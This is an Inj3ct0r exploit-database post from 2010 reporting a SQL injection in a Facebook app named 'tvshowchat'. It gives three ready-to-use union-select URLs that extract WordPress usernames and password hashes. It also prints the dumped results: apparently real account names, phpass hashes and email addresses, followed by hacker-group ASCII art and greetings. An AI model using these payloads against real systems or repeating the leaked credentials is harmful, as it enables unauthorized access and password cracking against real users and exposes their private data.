$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:[email protected] lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:[email protected] tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:[email protected] see request: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1-- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1-- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1-- goOd =] Nice Hacking old school xD __ __ __ __ /'__`\ /'__`\/\ \\ \ /\ \/\ \ __ _/\ \/\ \ \ \\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_ \ \ \_\ \/> </\ \ \_\ \ \__ ,__\ \ \____//\_/\_\\ \____/\/_/\_\_/ \/___/ \//\/_/ \/___/ \/_/ [Conclusion] There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database) __ __ ______ /'__`\ /'__`\/\ ___\ /\ \/\ \ __ _/\ \/\ \ \ \__/ \ \ \ \ \/\ \/'\ \ \ \ \ \___``\ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Greetz] Greetz all Member Inj3ct0r.com Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go http://inj3ct0r.com/links =] Personally h4x0rz: 0x1D, Z0m[b]!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX, however, n1gh7m4r3, StutM (unitx.net) , Andrew Horton.. You are good hackers. Respect y0u! Farzin0123(Pianist) visit site : Ueg88.blogfa.com ! Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team! At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook.zip We want to thank the following people for their contribution. Do not forget to keep track of vulnerabilities in Inj3ct0r.com GoOd luck Hackers! =] # Inj3ct0r.com [2010-04-06]
